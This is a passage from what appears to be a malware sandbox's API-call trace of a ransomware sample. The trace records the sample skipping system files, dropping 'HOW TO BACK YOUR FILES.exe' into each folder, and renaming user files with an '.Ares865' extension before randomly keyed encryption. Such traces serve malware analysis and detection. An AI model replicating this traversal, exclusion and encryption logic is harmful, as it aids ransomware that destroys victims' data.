dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.232] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.233] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x70be9aa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x105a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wscRGB.icc.Ares865", cAlternateFileName="WSCRGB~1.ARE")) returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="aoldtz.exe") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2=".") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="..") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="windows") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="bootmgr") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="temp") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="pagefile.sys") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="boot") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="ids.txt") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="ntuser.dat") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="perflogs") returned 1 [0106.233] lstrcmpiW (lpString1="wscRGB.icc.Ares865", lpString2="MSBuild") returned 1 [0106.233] lstrlenW (lpString="wscRGB.icc.Ares865") returned 18 [0106.233] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\*") returned 220 [0106.233] lstrcpyW (in: lpString1=0x2cce5b6, lpString2="wscRGB.icc.Ares865" | out: lpString1="wscRGB.icc.Ares865") returned="wscRGB.icc.Ares865" [0106.233] lstrlenW (lpString="wscRGB.icc.Ares865") returned 18 [0106.233] lstrlenW (lpString="Ares865") returned 7 [0106.233] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0106.233] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsRGB.icc.Ares865", cAlternateFileName="WSRGBI~1.ARE")) returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="aoldtz.exe") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2=".") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="..") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="windows") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="bootmgr") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="temp") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="pagefile.sys") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="boot") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="ids.txt") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="ntuser.dat") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="perflogs") returned 1 [0106.233] lstrcmpiW (lpString1="wsRGB.icc.Ares865", lpString2="MSBuild") returned 1 [0106.234] lstrlenW (lpString="wsRGB.icc.Ares865") returned 17 [0106.234] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Color\\Profiles\\wscRGB.icc.Ares865") returned 237 [0106.234] lstrcpyW (in: lpString1=0x2cce5b6, lpString2="wsRGB.icc.Ares865" | out: lpString1="wsRGB.icc.Ares865") returned="wsRGB.icc.Ares865" [0106.234] lstrlenW (lpString="wsRGB.icc.Ares865") returned 17 [0106.234] lstrlenW (lpString="Ares865") returned 7 [0106.234] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0106.234] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce60f420, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce6f3c60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x70cce2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xd80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wsRGB.icc.Ares865", cAlternateFileName="WSRGBI~1.ARE")) returned 0 [0106.234] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.234] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0106.234] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0106.234] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0106.234] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 211 [0106.234] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0106.234] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.234] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.235] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.235] GetLastError () returned 0x0 [0106.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.235] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.235] CloseHandle (hObject=0x120) returned 1 [0106.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.235] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.235] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.236] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.236] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.236] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.236] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4febe4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.236] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.236] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.236] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.236] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.236] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="aoldtz.exe") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2=".") returned 1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="..") returned 1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="windows") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="bootmgr") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="temp") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="pagefile.sys") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="boot") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="ids.txt") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="ntuser.dat") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="perflogs") returned -1 [0106.236] lstrcmpiW (lpString1="10.0", lpString2="MSBuild") returned -1 [0106.236] lstrlenW (lpString="10.0") returned 4 [0106.236] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*") returned 213 [0106.236] lstrcpyW (in: lpString1=0x2cce5a8, lpString2="10.0" | out: lpString1="10.0") returned="10.0" [0106.236] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0106.236] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1b2) returned 0x2cc760 [0106.236] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0106.236] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0106.236] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0106.236] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4febe4e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4febe4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0106.237] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0106.237] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0106.237] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc760 | out: hHeap=0x2b0000) returned 1 [0106.237] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0106.237] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 216 [0106.237] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0106.237] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0106.237] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0106.238] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0106.238] GetLastError () returned 0x0 [0106.238] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0106.238] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0106.238] CloseHandle (hObject=0x120) returned 1 [0106.238] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0106.238] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0106.238] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0106.238] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.238] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0106.238] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0106.238] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4fee4640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4fee4640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0106.238] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.238] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0106.238] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0106.239] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0106.239] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdobeCMapFnt10.lst", cAlternateFileName="ADOBEC~1.LST")) returned 1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="aoldtz.exe") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".") returned 1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="..") returned 1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="windows") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="bootmgr") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="temp") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="pagefile.sys") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="boot") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="ids.txt") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="ntuser.dat") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="perflogs") returned -1 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2="MSBuild") returned -1 [0106.239] lstrlenW (lpString="AdobeCMapFnt10.lst") returned 18 [0106.239] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*") returned 218 [0106.239] lstrcpyW (in: lpString1=0x2cce5b2, lpString2="AdobeCMapFnt10.lst" | out: lpString1="AdobeCMapFnt10.lst") returned="AdobeCMapFnt10.lst" [0106.239] lstrlenW (lpString="AdobeCMapFnt10.lst") returned 18 [0106.239] lstrlenW (lpString="Ares865") returned 7 [0106.239] lstrcmpiW (lpString1="t10.lst", lpString2="Ares865") returned 1 [0106.239] lstrlenW (lpString=".dll") returned 4 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".dll") returned 1 [0106.239] lstrlenW (lpString=".lnk") returned 4 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".lnk") returned 1 [0106.239] lstrlenW (lpString=".ini") returned 4 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".ini") returned 1 [0106.239] lstrlenW (lpString=".sys") returned 4 [0106.239] lstrcmpiW (lpString1="AdobeCMapFnt10.lst", lpString2=".sys") returned 1 [0106.239] lstrlenW (lpString="AdobeCMapFnt10.lst") returned 18 [0106.240] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.Ares865") returned 243 [0106.240] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.ares865"), dwFlags=0x1) returned 1 [0106.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0106.241] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35116) returned 1 [0106.241] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0106.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0106.242] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0106.242] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0106.243] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0106.243] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.243] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x8c30, lpName=0x0) returned 0x124 [0106.245] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8c30) returned 0x190000 [0106.335] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0106.359] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0106.360] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0106.362] 